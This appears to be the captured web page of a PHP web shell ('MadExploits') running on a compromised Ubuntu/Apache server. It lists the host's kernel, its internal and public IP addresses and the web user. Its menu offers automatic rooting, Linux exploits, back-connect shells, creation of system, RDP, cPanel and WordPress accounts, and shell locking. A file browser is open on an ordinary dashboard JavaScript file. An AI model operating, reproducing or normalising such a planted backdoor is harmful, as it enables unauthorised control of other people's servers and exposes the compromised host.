Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.225.235.215
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
public /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap-checkbox-radio-switc...
15.05
KB
-rw-rw-r--
bootstrap-notify.js
12.9
KB
-rw-rw-r--
bootstrap-select.js
17.38
KB
-rw-rw-r--
bootstrap.min.js
35.95
KB
-rw-rw-r--
chartist.min.js
35.18
KB
-rw-rw-r--
dataTables.js
81.14
KB
-rw-rw-r--
demo.js
5.33
KB
-rw-rw-r--
jquery-1.10.2.js
266.79
KB
-rw-rw-r--
jquery-3.1.1.min.js
84.68
KB
-rw-rw-r--
jqueryui.js
508.51
KB
-rw-rw-r--
light-bootstrap-dashboard.js
5.88
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : light-bootstrap-dashboard.js
/*! ========================================================= * Light Bootstrap Dashboard - v1.3.1.0 ========================================================= * Product Page: http://www.creative-tim.com/product/light-bootstrap-dashboard * Copyright 2017 Creative Tim (http://www.creative-tim.com) * Licensed under MIT (https://github.com/creativetimofficial/light-bootstrap-dashboard/blob/master/LICENSE.md) ========================================================= * The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. */ var searchVisible = 0; var transparent = true; var transparentDemo = true; var fixedTop = false; var navbar_initialized = false; $(document).ready(function(){ window_width = $(window).width(); // check if there is an image set for the sidebar's background lbd.checkSidebarImage(); // Init navigation toggle for small screens if(window_width <= 991){ lbd.initRightMenu(); } // Activate the tooltips $('[rel="tooltip"]').tooltip(); // Activate the switches with icons if($('.switch').length != 0){ $('.switch')['bootstrapSwitch'](); } // Activate regular switches if($("[data-toggle='switch']").length != 0){ $("[data-toggle='switch']").wrap('<div class="switch" />').parent().bootstrapSwitch(); } $('.form-control').on("focus", function(){ $(this).parent('.input-group').addClass("input-group-focus"); }).on("blur", function(){ $(this).parent(".input-group").removeClass("input-group-focus"); }); }); // activate collapse right menu when the windows is resized $(window).resize(function(){ if($(window).width() <= 991){ lbd.initRightMenu(); } }); lbd = { misc:{ navbar_menu_visible: 0 }, checkSidebarImage: function(){ $sidebar = $('.sidebar'); image_src = $sidebar.data('image'); if(image_src !== undefined){ sidebar_container = '<div class="sidebar-background" style="background-image: url(' + image_src + ') "/>' $sidebar.append(sidebar_container); } }, initRightMenu: function(){ if(!navbar_initialized){ $navbar = $('nav').find('.navbar-collapse').first().clone(true); $sidebar = $('.sidebar'); sidebar_color = $sidebar.data('color'); $logo = $sidebar.find('.logo').first(); logo_content = $logo[0].outerHTML; ul_content = ''; $navbar.attr('data-color',sidebar_color); // add the content from the sidebar to the right menu content_buff = $sidebar.find('.nav').html(); ul_content = ul_content + content_buff; //add the content from the regular header to the right menu $navbar.children('ul').each(function(){ content_buff = $(this).html(); ul_content = ul_content + content_buff; }); ul_content = '<ul class="nav navbar-nav">' + ul_content + '</ul>'; navbar_content = logo_content + ul_content; $navbar.html(navbar_content); $('body').append($navbar); background_image = $sidebar.data('image'); if(background_image != undefined){ $navbar.css('background',"url('" + background_image + "')") .removeAttr('data-nav-image') .addClass('has-image'); } $toggle = $('.navbar-toggle'); $navbar.find('a').removeClass('btn btn-round btn-default'); $navbar.find('button').removeClass('btn-round btn-fill btn-info btn-primary btn-success btn-danger btn-warning btn-neutral'); $navbar.find('button').addClass('btn-simple btn-block'); $toggle.click(function (){ if(lbd.misc.navbar_menu_visible == 1) { $('html').removeClass('nav-open'); lbd.misc.navbar_menu_visible = 0; $('#bodyClick').remove(); setTimeout(function(){ $toggle.removeClass('toggled'); }, 400); } else { setTimeout(function(){ $toggle.addClass('toggled'); }, 430); div = '<div id="bodyClick"></div>'; $(div).appendTo("body").click(function() { $('html').removeClass('nav-open'); lbd.misc.navbar_menu_visible = 0; $('#bodyClick').remove(); setTimeout(function(){ $toggle.removeClass('toggled'); }, 400); }); $('html').addClass('nav-open'); lbd.misc.navbar_menu_visible = 1; } }); navbar_initialized = true; } } } // Returns a function, that, as long as it continues to be invoked, will not // be triggered. The function will be called after it stops being called for // N milliseconds. If `immediate` is passed, trigger the function on the // leading edge, instead of the trailing. function debounce(func, wait, immediate) { var timeout; return function() { var context = this, args = arguments; clearTimeout(timeout); timeout = setTimeout(function() { timeout = null; if (!immediate) func.apply(context, args); }, wait); if (immediate && !timeout) func.apply(context, args); }; };
Close